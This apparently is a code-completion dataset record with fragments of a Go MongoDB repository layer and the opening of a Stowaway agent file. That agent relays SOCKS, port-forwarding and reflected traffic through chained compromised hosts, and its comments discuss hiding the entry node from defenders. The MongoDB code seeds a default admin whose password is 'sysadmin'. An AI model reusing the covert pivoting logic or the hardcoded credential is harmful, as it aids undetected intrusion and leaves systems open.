fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
| func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) {
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | }
| random_line_split |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok |
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) initSystemUsers() ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
}
func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) {
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | { log.Fatal(err) } | conditional_block |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok { log.Fatal(err) }
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) i | ) ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
}
func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) {
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | nitSystemUsers( | identifier_name |
startnode.go | package agent
import (
"fmt"
"io"
"net"
"os"
"strconv"
"strings"
"Stowaway/node"
"Stowaway/share"
"Stowaway/utils"
)
//startnode启动代码
//todo:可以为startnode加入一个保护机制,在startnode启动时可以设置是否开启此机制
//即当有节点异常断线时,可设置是否让startnode暂时断开与第二级节点的连接
//防止异常断线是由于管理员发现节点引起的,并根据connection进行逐点反查从而顺藤摸瓜找到入口点startnode,使得渗透测试者失去内网的入口点
//先暂时不加入,权当一个胡思乱想的idea,今后可视情况增加对startnode保护机制的处理代码,使得入口点更加稳固和隐蔽
func HandleStartNodeConn(connToAdmin *net.Conn, monitor, listenPort, reConn string, passive bool, NODEID string) {
go HandleConnFromAdmin(connToAdmin, monitor, listenPort, reConn, passive, NODEID)
go HandleConnToAdmin(connToAdmin)
}
//管理startnode发往admin的数据
func HandleConnToAdmin(connToAdmin *net.Conn) {
for {
proxyData := <-ProxyChan.ProxyChanToUpperNode
_, err := (*connToAdmin).Write(proxyData)
if err != nil {
continue
}
| ODEID string) {
var (
CannotRead = make(chan bool, 1)
GetName = make(chan bool, 1)
stdin io.Writer
stdout io.Reader
)
for {
AdminData, err := utils.ExtractPayload(*connToAdmin, AgentStatus.AESKey, NODEID, false)
if err != nil {
AdminOffline(reConn, monitor, listenPort, passive)
go SendInfo(NODEID) //重连后发送自身信息
go SendNote(NODEID) //重连后发送admin设置的备忘
continue
}
if AdminData.NodeId == NODEID {
switch AdminData.Type {
case "DATA":
switch AdminData.Command {
case "SOCKSDATA":
SocksDataChanMap.RLock()
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.RUnlock()
} else {
SocksDataChanMap.RUnlock()
SocksDataChanMap.Lock()
SocksDataChanMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HanleClientSocksConn(SocksDataChanMap.Payload[AdminData.Clientid], SocksInfo.SocksUsername, SocksInfo.SocksPass, AdminData.Clientid, NODEID)
SocksDataChanMap.Payload[AdminData.Clientid] <- AdminData.Info
SocksDataChanMap.Unlock()
}
case "FILEDATA": //接收文件内容
slicenum, _ := strconv.Atoi(AdminData.FileSliceNum)
FileDataMap.Lock()
FileDataMap.Payload[slicenum] = AdminData.Info
FileDataMap.Unlock()
case "FORWARD":
TryForward(AdminData.Info, AdminData.Clientid)
case "FORWARDDATA":
ForwardConnMap.RLock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
} else {
PortFowardMap.Payload[AdminData.Clientid] = make(chan string, 1)
go HandleForward(PortFowardMap.Payload[AdminData.Clientid], AdminData.Clientid)
PortFowardMap.Payload[AdminData.Clientid] <- AdminData.Info
}
PortFowardMap.Unlock()
}
ForwardConnMap.RUnlock()
case "FORWARDFIN":
ForwardConnMap.Lock()
if _, ok := ForwardConnMap.Payload[AdminData.Clientid]; ok {
ForwardConnMap.Payload[AdminData.Clientid].Close()
delete(ForwardConnMap.Payload, AdminData.Clientid)
}
ForwardConnMap.Unlock()
PortFowardMap.Lock()
if _, ok := PortFowardMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
if !utils.IsClosed(PortFowardMap.Payload[AdminData.Clientid]) {
close(PortFowardMap.Payload[AdminData.Clientid])
}
delete(PortFowardMap.Payload, AdminData.Clientid)
}
}
PortFowardMap.Unlock()
case "REFLECTDATARESP":
ReflectConnMap.Lock()
ReflectConnMap.Payload[AdminData.Clientid].Write([]byte(AdminData.Info))
ReflectConnMap.Unlock()
case "REFLECTTIMEOUT":
fallthrough
case "REFLECTOFFLINE":
ReflectConnMap.Lock()
if _, ok := ReflectConnMap.Payload[AdminData.Clientid]; ok {
ReflectConnMap.Payload[AdminData.Clientid].Close()
delete(ReflectConnMap.Payload, AdminData.Clientid)
}
ReflectConnMap.Unlock()
case "FINOK":
SocksDataChanMap.Lock() //性能损失?
if _, ok := SocksDataChanMap.Payload[AdminData.Clientid]; ok {
if !utils.IsClosed(SocksDataChanMap.Payload[AdminData.Clientid]) {
close(SocksDataChanMap.Payload[AdminData.Clientid])
}
delete(SocksDataChanMap.Payload, AdminData.Clientid)
}
